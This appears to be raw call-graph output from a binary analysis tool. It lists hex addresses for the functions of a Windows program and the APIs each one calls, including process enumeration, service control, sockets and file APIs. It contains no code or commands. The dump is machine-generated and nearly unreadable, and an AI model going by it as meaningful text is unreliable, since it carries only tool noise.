API calls 86056->86058 86057->86032 86064 42c796 86058->86064 86059 42c812 86060 46fe32 VariantClear 86059->86060 86061 42c82a InterlockedDecrement 86060->86061 86221 46ff07 54 API calls 86061->86221 86063 42c864 86222 45e737 90 API calls 3 library calls 86063->86222 86064->86059 86064->86063 86067 40ba10 52 API calls 86064->86067 86065 42c9ec 86067->86064 86071 408f40 VariantClear 86081 42c849 86071->86081 86074 408f40 VariantClear 86077 42c891 86074->86077 86075 402780 52 API calls 86075->86081 86223 410c60 VariantClear ctype 86077->86223 86078 401980 53 API calls 86078->86081 86081->86065 86081->86071 86081->86075 86081->86078 86083 40a780 381 API calls 86081->86083 86082 42c874 86082->86074 86084 42ca59 86082->86084 86083->86081 86084->86084 86086 40afc4 86085->86086 86087 40b156 86085->86087 86088 40afd5 86086->86088 86089 42d1e3 86086->86089 86228 45e737 90 API calls 3 library calls 86087->86228 86092 40a780 385 API calls 86088->86092 86110 40b11a ctype 86088->86110 86229 45e737 90 API calls 3 library calls 86089->86229 86095 40b00a 86092->86095 86093 42d1f8 86099 408f40 VariantClear 86093->86099 86094 40b143 86094->85919 86095->86093 86097 40b012 86095->86097 86100 40b04a 86097->86100 86102 42d231 VariantClear 86097->86102 86106 40b094 ctype 86097->86106 86098 42d4db 86098->86098 86099->86094 86109 40b05c ctype 86100->86109 86230 40e270 VariantClear ctype 86100->86230 86101 40b108 86101->86110 86231 40e270 VariantClear ctype 86101->86231 86102->86109 86103 42d45a VariantClear 86103->86110 86104 42d425 ctype 86104->86103 86104->86110 86106->86101 86106->86104 86107 4115d7 52 API calls 86107->86106 86109->86106 86109->86107 86110->86094 86232 45e737 90 API calls 3 library calls 86110->86232 86112 408fff 86111->86112 86114 40900d 86111->86114 86233 403ea0 52 API calls __cinit 86112->86233 86116 42c3f6 86114->86116 86118 42c44a 86114->86118 86119 40a780 387 API calls 86114->86119 86120 42c47b 86114->86120 86123 42c564 86114->86123 86125 42c4cb 86114->86125 86127 42c548 86114->86127 86131 409112 86114->86131 86133 4090df 86114->86133 86135 42c528 86114->86135 86137 4090ea 86114->86137 86145 4090f2 ctype 86114->86145 86235 4534e3 52 API calls 86114->86235 86237 40c4e0 387 API calls 86114->86237 86236 45e737 90 API calls 3 library calls 86116->86236 86238 45e737 90 API calls 3 library calls 86118->86238 86119->86114 86239 451b42 61 API calls 86120->86239 86128 408f40 VariantClear 86123->86128 86241 47faae 387 API calls 86125->86241 86244 45e737 90 API calls 3 library calls 86127->86244 86128->86145 86129 42c491 86129->86145 86240 45e737 90 API calls 3 library calls 86129->86240 86130 42c4da 86130->86145 86242 45e737 90 API calls 3 library calls 86130->86242 86131->86127 86140 40912b 86131->86140 86133->86137 86234 408e80 VariantClear 86133->86234 86243 45e737 90 API calls 3 library calls 86135->86243 86141 408f40 VariantClear 86137->86141 86142 403e10 53 API calls 86140->86142 86140->86145 86141->86145 86143 40914b 86142->86143 86144 408f40 VariantClear 86143->86144 86144->86145 86145->85919 86245 408d90 86146->86245 86148 429778 86290 410c60 VariantClear ctype 86148->86290 86150 429780 86151 408cf9 86151->86148 86152 42976c 86151->86152 86154 408d2d 86151->86154 86289 45e737 90 API calls 3 library calls 86152->86289 86261 403d10 86154->86261 86157 408d71 ctype 86157->85919 86158 408f40 VariantClear 86159 408d45 ctype 86158->86159 86159->86157 86159->86158 86161 40d15f 86160->86161 86163 425c87 86160->86163 86161->85919 86162 425cc7 86163->86162 86164 425ca1 TranslateAcceleratorW 86163->86164 86164->86161 86166 42602f 86165->86166 86169 40d17f 86165->86169 86166->85919 86167 42608e IsDialogMessageW 86168 40d18c 86167->86168 86167->86169 86168->85919 86169->86167 86169->86168 87343 430c46 GetClassLongW 86169->87343 86171->85919 86172->85868 86173->85874 86174->85919 86175->85919 86176->85919 86177->85925 86178->85925 86179->85925 86180->85925 86181->85925 86182->85925 86184 443d51 86183->86184 86185 443d33 _wcslen 86183->86185 87345 433ee0 CreateToolhelp32Snapshot Process32FirstW 86184->87345 86185->86184 86188 443d41 86185->86188 86187 443d59 86187->85925 87344 433d9e 63 API calls 4 library calls 86188->87344 86190 443d49 86190->85925 86191->85925 86193 403cdf 86192->86193 86194 408f40 VariantClear 86193->86194 86195 403ce7 86194->86195 86195->85912 86196->85925 86197->85925 86198->85919 86199->85865 86200->86039 86202 453439 86201->86202 86203 453419 86201->86203 86202->86043 86204 45342f 86203->86204 86226 4531b1 85 API calls 5 library calls 86203->86226 86204->86043 86206 453425 86206->86043 86207->86049 86208->86051 86210 46fe66 86209->86210 86211 46fe41 86209->86211 86210->86057 86212 46fe59 86211->86212 86227 40e1c0 VariantClear ctype 86211->86227 86212->86057 86214->86042 86216 401b16 _wcslen 86215->86216 86217 4115d7 52 API calls 86216->86217 86220 401b63 86216->86220 86218 401b4b _memmove 86217->86218 86219 4115d7 52 API calls 86218->86219 86219->86220 86220->86056 86221->86081 86222->86082 86223->86042 86226->86206 86227->86211 86228->86089 86229->86093 86230->86109 86231->86110 86232->86098 86233->86114 86234->86137 86235->86114 86236->86145 86237->86114 86238->86145 86239->86129 86240->86145 86241->86130 86242->86145 86243->86145 86244->86123 86246 4289d2 86245->86246 86247 408db3 86245->86247 86295 45e737 90 API calls 3 library calls 86246->86295 86291 40bec0 86247->86291 86250 408dc9 86251 4289e5 86250->86251 86253 40ba10 52 API calls 86250->86253 86254 428a05 86250->86254 86256 40a780 387 API calls 86250->86256 86257 408e64 86250->86257 86259 408f40 VariantClear 86250->86259 86260 408e5a 86250->86260 86296 45e737 90 API calls 3 library calls 86251->86296 86253->86250 86255 408f40 VariantClear 86254->86255 86255->86260 86256->86250 86258 408f40 VariantClear 86257->86258 86258->86260 86259->86250 86260->86151 86262 408f40 VariantClear 86261->86262 86263 403d20 86262->86263 86264 403cd0 VariantClear 86263->86264 86265 403d4d 86264->86265 86298 4755ad 86265->86298 86301 45c8c1 86265->86301 86308 46d402 86265->86308 86327 46d1a6 86265->86327 86337 432fee OpenSCManagerW 86265->86337 86344 45e17d 86265->86344 86354 45cc7a 86265->86354 86368 4589fe 86265->86368 86378 47b1db 86265->86378 86385 46e91c 86265->86385 86388 45a3fe 86265->86388 86391 45c8fc 86265->86391 86398 457e3f 86265->86398 86409 46cef3 86265->86409 86451 47ac6d 86265->86451 86466 46beb2 86265->86466 86539 46f993 86265->86539 86578 40d3b0 86265->86578 86585 467897 86265->86585 86627 476d8d GetCursorPos GetForegroundWindow 86265->86627 86645 4653c8 86265->86645 86663 4589ac WSAStartup 86265->86663 86266 403d76 86266->86148 86266->86159 86289->86148 86290->86150 86292 40bed0 86291->86292 86293 40bef2 86292->86293 86297 45e737 90 API calls 3 library calls 86292->86297 86293->86250 86295->86251 86296->86254 86297->86293 86667 475077 86298->86667 86300 4755c0 86300->86266 86302 45340c 85 API calls 86301->86302 86303 45c8d2 86302->86303 86795 4335cd 86303->86795 86305 45c8d8 86306 45c8e8 86305->86306 86307 408f40 VariantClear 86305->86307 86306->86266 86307->86306 86813 40d370 86308->86813 86311 4533eb 85 API calls 86312 46d422 86311->86312 86818 45f645 WideCharToMultiByte 86312->86818 86314 46d429 gethostbyname 86315 46d437 WSAGetLastError 86314->86315 86316 46d469 _memmove 86314->86316 86317 46d44c 86315->86317 86318 46d47a inet_ntoa 86316->86318 86328 46d1bd 86327->86328 86867 4680ed 86328->86867 86330 46d1cb 86331 46d1d9 send 86330->86331 86332 408f40 VariantClear 86331->86332 86333 46d1ee 86332->86333 86334 46d223 86333->86334 86335 46d1fa WSAGetLastError 86333->86335 86334->86266 86336 46d218 86335->86336 86336->86266 86338 433004 LockServiceDatabase 86337->86338 86339 43303a 86337->86339 86340 433024 GetLastError 86338->86340 86341 43300f UnlockServiceDatabase CloseServiceHandle 86338->86341 86339->86266 86342 433033 CloseServiceHandle 86340->86342 86343 433031 86340->86343 86341->86266 86342->86339 86343->86342 86345 45e198 86344->86345 86346 45e19c 86345->86346 86347 45e1b8 86345->86347 86348 408f40 VariantClear 86346->86348 86349 45e1cc 86347->86349 86350 45e1db FindClose 86347->86350 86351 45e1a4 86348->86351 86352 45e1d9 ctype 86349->86352 86872 44ae3e 86349->86872 86350->86352 86351->86266 86352->86266 86355 45ccd7 86354->86355 86357 45cc91 86354->86357 86356 45340c 85 API calls 86355->86356 86356->86357 86358 45340c 85 API calls 86357->86358 86359 45ccf8 86358->86359 86885 433a13 GetFileVersionInfoSizeW 86359->86885 86361 45ccfe 86362 45cd05 86361->86362 86363 45cc98 86361->86363 86364 40e710 53 API calls 86362->86364 86366 40e710 53 API calls 86363->86366 86365 45cd13 86364->86365 86365->86266 86367 45ccbc 86366->86367 86367->86266 86915 40c650 86368->86915 86371 458a1c WSAGetLastError 86373 458a31 86371->86373 86372 458a49 86918 4530c9 VariantClear 86372->86918 86917 4530c9 VariantClear 86373->86917 86375 458a5a 86375->86266 86377 458a42 86377->86266 86919 471f53 86378->86919 86380 47b1eb 86930 46f3c1 86380->86930 86382 47b1f3 86383 408f40 VariantClear 86382->86383 86384 47b212 86382->86384 86383->86384 86384->86266 87018 46e785 86385->87018 86387 46e92f 86387->86266 86389 45340c 85 API calls 86388->86389 86390 45a40f SetWindowTextW 86389->86390 86390->86266 86392 45340c 85 API calls 86391->86392 86393 45c90d 86392->86393 87161 4339fa 86393->87161 86396 45c923 86396->86266 86397 408f40 VariantClear 86397->86396 86399 45340c 85 API calls 86398->86399 86400 457e61 86399->86400 86401 443d19 67 API calls 86400->86401 86402 457e67 86401->86402 86403 457e71 86402->86403 86404 457e9d 86402->86404 86405 408f40 VariantClear 86403->86405 86406 408f40 VariantClear 86404->86406 86407 457e76 86405->86407 86408 457ea2 86406->86408 86407->86266 86408->86266 86410 45340c 85 API calls 86409->86410 86411 46cf16 86410->86411 86412 40bc70 52 API calls 86411->86412 86413 46cf23 86412->86413 86414 40bc70 52 API calls 86413->86414 86415 46cf41 86414->86415 86416 40e710 53 API calls 86415->86416 86417 46cf58 86416->86417 86418 46cf70 _wcslen 86417->86418 86419 46cf61 OleInitialize 86417->86419 86420 46cf85 86418->86420 86421 46d0f2 86418->86421 86419->86418 86422 4339fa 3 API calls 86420->86422 86423 46d119 GetActiveObject 86421->86423 86425 45340c 85 API calls 86421->86425 86424 46cf8b 86422->86424 86426 46d133 86423->86426 86427 46d029 86423->86427 86428 46d018 CreateBindCtx 86424->86428 86431 402160 52 API calls 86424->86431 86429 46d10a CLSIDFromProgID 86425->86429 86426->86427 86436 46d170 86426->86436 87173 451b42 61 API calls 86427->87173 86428->86427 86432 46d055 MkParseDisplayName 86428->86432 86429->86423 86429->86427 86449 46cf9f 86431->86449 86433 46d06f 86432->86433 86434 46d0dc 86432->86434 86439 46d0a7 86433->86439 87174 451b42 61 API calls 86433->87174 87176 451b42 61 API calls 86434->87176 87177 468070 104 API calls ctype 86436->87177 86438 46d036 86438->86266 86447 46d0c7 86439->86447 86443 46cff8 86444 46d014 86443->86444 87172 40bd50 52 API calls 86443->87172 86444->86428 86447->86266 86449->86443 86450 40c600 52 API calls 86449->86450 87169 465177 52 API calls 86449->87169 87170 40bd50 52 API calls 86449->87170 87171 403020 52 API calls _memmove 86449->87171 86450->86449 86452 471f53 86 API calls 86451->86452 86453 47ac84 86452->86453 86454 46f3c1 107 API calls 86453->86454 86455 47ac8c 86454->86455 86456 47acc2 86455->86456 86457 47ac90 86455->86457 86458 40bc70 52 API calls 86456->86458 86459 408f40 VariantClear 86457->86459 86460 47accb 86458->86460 86461 47acab 86459->86461 87178 461383 86460->87178 86461->86266 86463 47acdc 86467 40bc70 52 API calls 86466->86467 86468 46bed3 86467->86468 86469 40bc70 52 API calls 86468->86469 86470 46bedc 86469->86470 86471 40bc70 52 API calls 86470->86471 86472 46bee5 86471->86472 86473 40e710 53 API calls 86472->86473 86474 46bef2 86473->86474 86475 45340c 85 API calls 86474->86475 86476 46bf00 86475->86476 86477 401b10 52 API calls 86476->86477 86478 46bf0c 86477->86478 87198 463980 86478->87198 86540 40e710 53 API calls 86539->86540 86541 46f9ba 86540->86541 86542 4115d7 52 API calls 86541->86542 86549 46fa26 86541->86549 86543 46f9d3 86542->86543 86545 46f9df 86543->86545 87253 40da60 53 API calls 86543->87253 86544 46fa38 86544->86266 86547 4533eb 85 API calls 86545->86547 86548 46f9f0 86547->86548 86551 40de40 60 API calls 86548->86551 86549->86544 86553 46fa7a 86549->86553 87239 44c285 86549->87239 86552 46f9fd 86551->86552 86552->86549 86558 46fa01 86552->86558 86554 46fb17 86553->86554 86555 46fa99 86553->86555 86557 40bc70 52 API calls 86554->86557 86556 4115d7 52 API calls 86555->86556 86559 46fa9f 86556->86559 86560 46fb20 86557->86560 86561 46fa0b 86558->86561 86564 44ae3e CloseHandle 86558->86564 86562 46fab6 86559->86562 87254 443ee5 ReadFile SetFilePointerEx 86559->87254 87242 46ea94 86560->87242 86561->86266 86573 46faba ctype 86562->86573 87255 453132 53 API calls __cftof2_l 86562->87255 86564->86561 86566 46fb30 86566->86573 87256 40e6a0 53 API calls 86566->87256 86568 46faea _memmove 86571 403cd0 VariantClear 86568->86571 86570 46fb52 86572 403cd0 VariantClear 86570->86572 86571->86573 86572->86573 86574 46fb99 86573->86574 86575 40da20 CloseHandle 86573->86575 86574->86266 86576 46fb8b 86575->86576 86577 44ae3e CloseHandle 86576->86577 86577->86574 86579 40d3c4 86578->86579 86580 40d3cc timeGetTime 86579->86580 86581 42e19d Sleep 86579->86581 86582 40d3e2 86580->86582 86583 4091e0 385 API calls 86582->86583 86584 40d3fb 86583->86584 86584->86266 86586 4678bb 86585->86586 86587 467947 86586->86587 86590 45340c 85 API calls 86586->86590 86588 4115d7 52 API calls 86587->86588 86616 467964 86587->86616 86589 467989 86588->86589 86591 467995 86589->86591 87323 40da60 53 API calls 86589->87323 86592 4678f6 86590->86592 86595 4533eb 85 API calls 86591->86595 86594 413a0e __wsplitpath 46 API calls 86592->86594 86596 4678fc 86594->86596 86597 4679b7 86595->86597 86598 401b10 52 API calls 86596->86598 86599 40de40 60 API calls 86597->86599 86600 46790c 86598->86600 86601 4679c3 86599->86601 87322 40d200 52 API calls 2 library calls 86600->87322 86603 4679c7 GetLastError 86601->86603 86604 467a05 86601->86604 86606 403cd0 VariantClear 86603->86606 86607 467a2c 86604->86607 86608 467a4b 86604->86608 86605 467917 86605->86587 86610 4339fa 3 API calls 86605->86610 86609 4679dc 86606->86609 86611 4115d7 52 API calls 86607->86611 86612 4115d7 52 API calls 86608->86612 86613 4679e6 86609->86613 86619 44ae3e CloseHandle 86609->86619 86614 467928 86610->86614 86617 467a31 86611->86617 86618 467a49 86612->86618 86615 408f40 VariantClear 86613->86615 86614->86587 86620 4335cd 56 API calls 86614->86620 86621 4679ed 86615->86621 86616->86266 87324 436299 52 API calls 2 library calls 86617->87324 86623 408f40 VariantClear 86618->86623 86619->86613 86624 467939 86620->86624 86621->86266 86625 467a88 86623->86625 86624->86587 86626 408f40 VariantClear 86624->86626 86625->86266 86626->86587 87325 43137e 86627->87325 86629 476db9 86630 476dd2 86629->86630 86631 476e2d 86629->86631 87330 40e830 53 API calls 86630->87330 86636 476e7a 86631->86636 86641 408f40 VariantClear 86631->86641 86633 476de0 87331 40cf00 53 API calls 86633->87331 86635 476deb 86637 408f40 VariantClear 86635->86637 86636->86266 86638 476df8 86637->86638 87332 40cf00 53 API calls 86638->87332 86640 476e0c 86643 408f40 VariantClear 86640->86643 86642 476e43 86641->86642 86642->86266 86644 476e19 86643->86644 86644->86266 86646 4653e2 86645->86646 86647 4533eb 85 API calls 86646->86647 86648 4653e9 86647->86648 87333 465225 86648->87333 86650 4653f4 86651 4653f8 socket 86650->86651 86655 465420 86650->86655 86652 46543f connect 86651->86652 86653 46540b WSAGetLastError 86651->86653 86657 465450 86652->86657 86658 46546b WSAGetLastError 86652->86658 86653->86655 86654 408f40 VariantClear 86656 465428 86654->86656 86655->86654 86656->86266 86659 408f40 VariantClear 86657->86659 87339 403c90 86658->87339 86661 465458 86659->86661 86661->86266 86662 465480 closesocket 86662->86655 86664 4589dd 86663->86664 87342 4530c9 VariantClear 86664->87342 86666 4589f4 86666->86266 86720 4533eb 86667->86720 86670 4750ee 86673 408f40 VariantClear 86670->86673 86671 475129 86724 4646e0 86671->86724 86678 4750f5 86673->86678 86674 47515e 86675 475162 86674->86675 86713 47518e 86674->86713 86676 408f40 VariantClear 86675->86676 86707 475169 86676->86707 86677 475357 86679 475365 86677->86679 86680 4754ea 86677->86680 86678->86300 86758 44b3ac 57 API calls 86679->86758 86765 464812 92 API calls 86680->86765 86686 4533eb 85 API calls 86686->86713 86695 475480 86697 408f40 VariantClear 86695->86697 86697->86707 86705 4754b5 86706 408f40 VariantClear 86705->86706 86706->86707 86707->86300 86713->86677 86713->86686 86713->86695 86713->86705 86713->86713 86756 436299 52 API calls 2 library calls 86713->86756 86757 463ad5 64 API calls __wcsicoll 86713->86757 86721 453404 86720->86721 86722 4533f8 86720->86722 86721->86670 86721->86671 86722->86721 86768 4531b1 85 API calls 5 library calls 86722->86768 86769 4536f7 53 API calls 86724->86769 86726 4646fc 86770 4426cd 59 API calls _wcslen 86726->86770 86728 464711 86730 40bc70 52 API calls 86728->86730 86736 46474b 86728->86736 86731 46472c 86730->86731 86771 461465 86731->86771 86735 464793 86735->86674 86736->86735 86784 463ad5 64 API calls __wcsicoll 86736->86784 86756->86713 86757->86713 86768->86721 86769->86726 86770->86728 86772 4614cf 86771->86772 86773 461478 86771->86773 86774 40c600 52 API calls 86772->86774 86773->86772 86776 461482 86773->86776 86775 4614da 86774->86775 86777 4614e1 86776->86777 86778 46149c 86776->86778 86784->86735 86796 4335eb _wcslen 86795->86796 86797 433615 GetFileAttributesW 86796->86797 86798 433649 86797->86798 86799 43362b GetLastError 86797->86799 86798->86305 86800 433636 CreateDirectoryW 86799->86800 86801 43364f 86799->86801 86800->86798 86800->86801 86801->86798 86809 410160 86801->86809 86803 433661 _wcsrchr 86804 433672 ctype 86803->86804 86805 4335cd 52 API calls 86803->86805 86804->86305 86806 43368f ctype 86805->86806 86807 4336b2 86806->86807 86808 43369e CreateDirectoryW 86806->86808 86807->86305 86808->86807 86810 410167 _wcslen 86809->86810 86811 4115d7 52 API calls 86810->86811 86812 41017e _wcscpy 86811->86812 86812->86803 86814 4115d7 52 API calls 86813->86814 86815 40d385 86814->86815 86816 4115d7 52 API calls 86815->86816 86817 40d391 86816->86817 86817->86311 86819 45f66d 86818->86819 86820 45f67c 86818->86820 86854 444d96 86819->86854 86821 4115d7 52 API calls 86820->86821 86823 45f683 WideCharToMultiByte 86821->86823 86841 45412d 86823->86841 86842 454177 86841->86842 86844 454140 86841->86844 86865 44c8cd 52 API calls _memmove 86842->86865 86844->86842 86846 454149 86844->86846 86845 45417d 86847 454184 86846->86847 86848 454153 86846->86848 86855 444da3 86854->86855 86856 444dc0 86855->86856 86866 434a13 52 API calls 86855->86866 86856->86314 86858 444db2 86859 4115d7 52 API calls 86858->86859 86859->86856 86865->86845 86866->86858 86868 468100 86867->86868 86869 4680fa 86867->86869 86868->86330 86871 467ac4 55 API calls 2 library calls 86869->86871 86871->86868 86873 44ae4b ctype 86872->86873 86875 443fdf 86872->86875 86873->86352 86880 40da20 86875->86880 86877 443feb 86884 4340db CloseHandle ctype 86877->86884 86879 444001 86879->86873 86881 40da37 86880->86881 86882 40da29 86880->86882 86881->86882 86883 40da3c CloseHandle 86881->86883 86882->86877 86883->86877 86884->86879 86886 433a32 86885->86886 86887 433a3a 86885->86887 86886->86361 86888 4115d7 52 API calls 86887->86888 86889 433a41 GetFileVersionInfoW 86888->86889 86890 433a5a _wcslen 86889->86890 86891 4115d7 52 API calls 86890->86891 86895 433a73 _wcscat _wcscpy 86891->86895 86894 433b68 VerQueryValueW 86896 433ab3 VerQueryValueW 86895->86896 86901 433acb _wcscat 86895->86901 86896->86901 86900 433b3b ctype _wcsncpy 86900->86361 86903 4114ab 86901->86903 86904 411523 86903->86904 86905 4114ba 86903->86905 86914 4113a8 58 API calls 3 library calls 86904->86914 86910 4114d1 86905->86910 86912 417f77 46 API calls __getptd_noexit 86905->86912 86908 4114c6 86910->86894 86910->86900 86912->86908 86914->86910 86916 40c662 closesocket 86915->86916 86916->86371 86916->86372 86917->86377 86918->86375 86946 408e80 VariantClear 86919->86946 86921 471f70 86922 471f76 86921->86922 86923 471f95 86921->86923 86924 4533eb 85 API calls 86922->86924 86925 402160 52 API calls 86923->86925 86926 471f82 86924->86926 86927 471fa5 86925->86927 86928 40e0a0 52 API calls 86926->86928 86927->86380 86929 471f8e 86928->86929 86929->86380 86931 46f3d5 86930->86931 86932 46f3e6 86931->86932 86935 46f427 86931->86935 86998 44b3ac 57 API calls 86932->86998 86934 46f3eb IsWindow 86936 46f41e 86934->86936 86937 46f3fb 86934->86937 86935->86936 86938 4533eb 85 API calls 86935->86938 86936->86382 86999 44cdaf 86937->86999 86940 46f459 86938->86940 86947 46ed8e 86940->86947 86946->86921 86948 46eda2 86947->86948 86949 40e0a0 52 API calls 86948->86949 86950 46edd0 86949->86950 86998->86934 87000 44cdbc 86999->87000 87019 46e7a2 87018->87019 87020 4115d7 52 API calls 87019->87020 87023 46e802 87019->87023 87021 46e7ad 87020->87021 87022 46e7b9 87021->87022 87079 40da60 53 API calls 87021->87079 87028 4533eb 85 API calls 87022->87028 87024 46e7e5 87023->87024 87031 46e82f 87023->87031 87025 408f40 VariantClear 87024->87025 87027 46e7ea 87025->87027 87027->86387 87029 46e7ca 87028->87029 87080 40de40 87029->87080 87030 46e8b5 87033 4680ed 55 API calls 87030->87033 87031->87030 87034 46e845 87031->87034 87036 46e8bb 87033->87036 87037 4533eb 85 API calls 87034->87037 87094 443fbe SetFilePointerEx SetFilePointerEx WriteFile 87036->87094 87046 46e84b 87037->87046 87039 46e87a 87059 4689f4 87039->87059 87043 46e883 87092 4013c0 52 API calls 87043->87092 87044 46e8d4 87048 408f40 VariantClear 87044->87048 87058 46e881 87044->87058 87046->87039 87046->87043 87047 46e88f 87049 40e0a0 52 API calls 87047->87049 87048->87058 87050 46e899 87049->87050 87093 40d200 52 API calls 2 library calls 87050->87093 87052 46e911 87052->86387 87053 40da20 CloseHandle 87055 46e903 87053->87055 87054 46e8a5 87056 4689f4 59 API calls 87054->87056 87057 44ae3e CloseHandle 87055->87057 87056->87058 87057->87052 87058->87052 87058->87053 87060 468a1a 87059->87060 87061 468a0a 87059->87061 87063 468a2e 87060->87063 87064 468a1e 87060->87064 87098 443f76 SetFilePointerEx SetFilePointerEx WriteFile 87061->87098 87067 468a44 87063->87067 87068 468a35 87063->87068 87099 443f0a 55 API calls ctype 87064->87099 87065 468a11 87065->87058 87069 40d370 52 API calls 87067->87069 87071 40d370 52 API calls 87068->87071 87072 468a49 87069->87072 87070 468a25 87070->87058 87073 468a3a 87071->87073 87074 45f645 54 API calls 87072->87074 87100 4541a8 54 API calls ctype 87073->87100 87076 468a41 87074->87076 87079->87022 87081 40da20 CloseHandle 87080->87081 87082 40de4e 87081->87082 87108 40f110 87082->87108 87085 4264fa 87092->87047 87093->87054 87094->87044 87098->87065 87099->87070 87100->87076 87109 40f125 CreateFileW 87108->87109 87110 42630c 87108->87110 87111 40de74 87109->87111 87110->87111 87112 426311 CreateFileW 87110->87112 87111->87085 87115 40dea0 87111->87115 87112->87111 87113 426337 87112->87113 87137 40df90 87113->87137 87116 40debc 87115->87116 87125 40df1c 87115->87125 87116->87125 87164 4339b6 GetFileAttributesW 87161->87164 87163 433a06 87163->86396 87163->86397 87165 4339d2 FindFirstFileW 87164->87165 87166 4339f5 87164->87166 87167 4339e3 87165->87167 87168 4339ea FindClose 87165->87168 87166->87163 87167->87163 87168->87166 87169->86449 87170->86449 87171->86449 87172->86444 87173->86438 87174->86439 87176->86447 87177->86447 87179 402160 52 API calls 87178->87179 87180 461395 87179->87180 87194 436458 87180->87194 87183 4613a2 SendMessageW 87184 4613b8 87183->87184 87185 4115d7 52 API calls 87184->87185 87192 461405 ctype 87192->86463 87197 436327 SendMessageTimeoutW 87194->87197 87196 436466 87196->87183 87196->87192 87197->87196 87199 402160 52 API calls 87198->87199 87200 463993 87199->87200 87201 402160 52 API calls 87200->87201 87240 443d73 2 API calls 87239->87240 87241 44c292 87240->87241 87241->86553 87243 46eac5 87242->87243 87244 46eaac 87242->87244 87273 45f72f 54 API calls 87243->87273 87245 46eab1 87244->87245 87246 46eabb 87244->87246 87257 4689aa 87245->87257 87265 46ea4a 87246->87265 87250 46eaca 87250->86566 87253->86545 87254->86562 87255->86568 87256->86570 87258 40d370 52 API calls 87257->87258 87259 4689b9 87258->87259 87274 44c228 87259->87274 87266 40d370 52 API calls 87265->87266 87267 46ea59 87266->87267 87268 44c228 54 API calls 87267->87268 87269 46ea67 87268->87269 87273->87250 87275 444d96 52 API calls 87274->87275 87322->86605 87323->86591 87324->86618 87326 4313b1 87325->87326 87327 431394 GetWindowRect 87325->87327 87328 4313c3 87326->87328 87329 4313bb ClientToScreen 87326->87329 87327->86629 87328->86629 87329->87328 87330->86633 87331->86635 87332->86640 87341 45a52f 54 API calls 87333->87341 87335 465246 inet_addr 87336 465259 87335->87336 87337 4652a8 htons 87336->87337 87338 465273 87336->87338 87337->86650 87338->86650 87340 403c9e 87339->87340 87340->86662 87341->87335 87342->86666 87343->86169 87344->86190 87352 433d5f 87345->87352 87347 433fbe CloseHandle 87347->86187 87348 433f30 Process32NextW 87348->87347 87351 433f1f _wcscat 87348->87351 87349 413a0e __wsplitpath 46 API calls 87349->87351 87350 4114ab __wcsicoll 58 API calls 87350->87351 87351->87347 87351->87348 87351->87349 87351->87350 87353 433d8b 87352->87353 87357 433d6e 87352->87357 87360 41319b 57 API calls __wcstoi64 87353->87360 87356 433d91 87356->87351 87357->87353 87358 433d98 87357->87358 87359 4131fc GetStringTypeW wcstoxq 87357->87359 87358->87351 87359->87357 87360->87356 87361->85935 87362->85948 87363->85948 87364->85948 87365->85948 87366->85948 87367->85966 87368->85966 87369->85974 87370->85959 87371->85996 87372->85996 87373->85996 87374->85987 87375->85996 87376->85996 87377 40ad09 87378 40bc10 53 API calls 87377->87378 87379 40ad1f 87378->87379 87381 40ad40 87379->87381 87384 40c1f0 87379->87384 87418 44b92d VariantClear 87381->87418 87383 42bc5b 87385 40c2c0 52 API calls 87384->87385 87386 40c21f 87385->87386 87387 42965b 87386->87387 87388 40c22a 87386->87388 87478 45e737 90 API calls 3 library calls 87387->87478 87390 40c232 87388->87390 87477 40c4e0 387 API calls 87388->87477 87391 40c23e 87390->87391 87396 429673 87390->87396 87393 40c256 87391->87393 87394 4296c7 87391->87394 87476 408e80 VariantClear 87393->87476 87480 45e737 90 API calls 3 library calls 87394->87480 87419 47e250 87396->87419 87399 42969a 87400 40c27c 87399->87400 87479 45e737 90 API calls 3 library calls 87399->87479 87400->87381 87402 40c25f 87402->87400 87403 429721 87402->87403 87481 457f66 87 API calls __write_nolock 87402->87481 87404 429753 87403->87404 87483 472f47 127 API calls 87403->87483 87485 408e80 VariantClear 87404->87485 87407 429708 87410 45340c 85 API calls 87407->87410 87409 429734 87413 45340c 85 API calls 87409->87413 87414 42970e _wcslen 87410->87414 87411 42975f 87412 408f40 VariantClear 87411->87412 87412->87400 87416 42973d _wcslen 87413->87416 87414->87403 87482 408e80 VariantClear 87414->87482 87416->87404 87484 408e80 VariantClear 87416->87484 87418->87383 87420 40bc70 52 API calls 87419->87420 87421 47e28d 87420->87421 87422 47e2ed 87421->87422 87424 47e2ae 87421->87424 87423 46fe32 VariantClear 87422->87423 87425 47e2f6 87423->87425 87497 408e80 VariantClear 87424->87497 87427 47e305 87425->87427 87428 47e319 87425->87428 87431 402160 52 API calls 87427->87431 87430 40e0a0 52 API calls 87428->87430 87429 47e2ba 87433 408f40 VariantClear 87429->87433 87432 47e315 87430->87432 87431->87432 87435 47e38e 87432->87435 87499 475a67 387 API calls 87432->87499 87434 47e2ca 87433->87434 87436 408f40 VariantClear 87434->87436 87486 47b291 87435->87486 87438 47e2d2 87436->87438 87498 410c60 VariantClear ctype 87438->87498 87439 47e346 87439->87435 87442 47e34a 87439->87442 87500 45e538 90 API calls 3 library calls 87442->87500 87443 47e3b7 87446 47e3ed 87443->87446 87447 47e3bb 87443->87447 87444 47e2da 87448 408f40 VariantClear 87444->87448 87455 47e48e 87446->87455 87502 408e80 VariantClear 87446->87502 87449 40e710 53 API calls 87447->87449 87450 47e2e2 87448->87450 87451 47e3c8 87449->87451 87450->87399 87452 40e710 53 API calls 87451->87452 87454 47e358 87452->87454 87453 408f40 VariantClear 87456 47e368 87453->87456 87454->87453 87458 47e250 387 API calls 87455->87458 87459 408f40 VariantClear 87456->87459 87462 47e4ae 87458->87462 87463 47e370 87459->87463 87460 47e481 87461 40e710 53 API calls 87460->87461 87461->87455 87467 408f40 VariantClear 87462->87467 87501 410c60 VariantClear ctype 87463->87501 87465 47e378 87466 408f40 VariantClear 87465->87466 87468 47e380 87466->87468 87469 47e4c0 87467->87469 87468->87399 87470 408f40 VariantClear 87469->87470 87471 47e4c8 87470->87471 87503 410c60 VariantClear ctype 87471->87503 87473 47e4d0 87474 408f40 VariantClear 87473->87474 87475 47e4d8 87474->87475 87475->87399 87476->87402 87477->87390 87478->87396 87479->87400 87480->87400 87481->87407 87482->87403 87483->87409 87484->87404 87485->87411 87487 47b2e7 87486->87487 87488 47b2a5 87486->87488 87487->87443 87489 40e710 53 API calls 87488->87489 87490 47b2af 87489->87490 87491 47b2b7 87490->87491 87492 47b2cf 87490->87492 87504 47974b 87491->87504 87494 47974b 144 API calls 87492->87494 87496 47b2df 87494->87496 87495 47b2c7 87495->87443 87496->87443 87497->87429 87498->87444 87499->87439 87500->87454 87501->87465 87502->87460 87503->87473 87505 479786 87504->87505 